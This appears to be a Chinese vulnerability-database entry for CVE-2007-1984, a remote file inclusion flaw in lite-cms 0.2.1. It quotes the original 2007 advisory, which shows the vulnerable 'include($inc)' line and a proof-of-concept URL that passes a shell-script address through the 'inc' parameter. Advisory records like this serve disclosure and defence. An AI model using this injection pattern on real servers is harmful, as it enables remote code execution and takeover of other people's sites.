lite-cms 'index.php' PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1191035 漏洞类型 未知
发布时间 2007-04-11 更新时间 2007-04-11
CVE编号 CVE-2007-1984 CNNVD-ID CNNVD-200704-195
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://www.securityfocus.com/bid/86346
https://cxsecurity.com/issue/WLB-2007040066
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-195
|漏洞详情
lite-cms的index.php中存在PHP远程文件包含漏洞。远程攻击者可以借助inc参数中的一个URL,执行任意的PHP代码。
|漏洞EXP
"""""""""""""""""""""""""""""""""""""""""""""""
"""  ::     ::                :::::   ::::  """
"""   ::   ::                 ::  :   ::    """
"""     ::::    ::   :: ::::: :::::   ::::  """
"""    ::  ::   ::: ::: :: :: ::  ::    ::  """
"""  ::      :: :: :  : ::::: ::   :: ::::  """
"""                                         """
"""""""""""""""""""""""""""""""""""""""""""""""
   Xmor$ Security Vulnerability Research TM

# Tilte: lite-cms-0.2.1 Remote File Include Vulnerabilities

# Author..................: [the_Edit0r]
# HomePage................: [ Www.XmorS-sEurity.coM ]
# Location ...............: [Iran]
# Software ...............: [lite-cms-0.2.1] 
# Impact..................: [ Remote ]
# Site Script ............: [http://sourceforge.net/projects/lite-cms/]
# We ArE .................: [ Scorpiunix,KAMY4r,Zer0.Cod3r,SilliCONIC,D3vil_B0y_ir,S.W.A.T,DarkAngel ]

------------------------------------- Code --------------------------------

<?php include($inc); ?>  line 159

index.php

------------------------------- proof Of Concept ---------------------------

www.example.com/[path]/index.php?inc=[sh3ll-Script]

------------------------------------------------------------------------
----

# Contact me : the_3dit0r[at]Yahoo[dot]coM

#  [ www.bugtraq.ir ] 
# [XmorS-SEcurity.coM]
|受影响的产品
Lite-CMS Lite-CMS 0.2.1
|参考资料

来源:BUGTRAQ
名称:20070404lite-cms-0.2.1RemoteFileIncludeVulnerabilities
链接:http://www.securityfocus.com/archive/1/archive/1/464672/100/0/threaded
来源:SREASON
名称:2559
链接:http://securityreason.com/securityalert/2559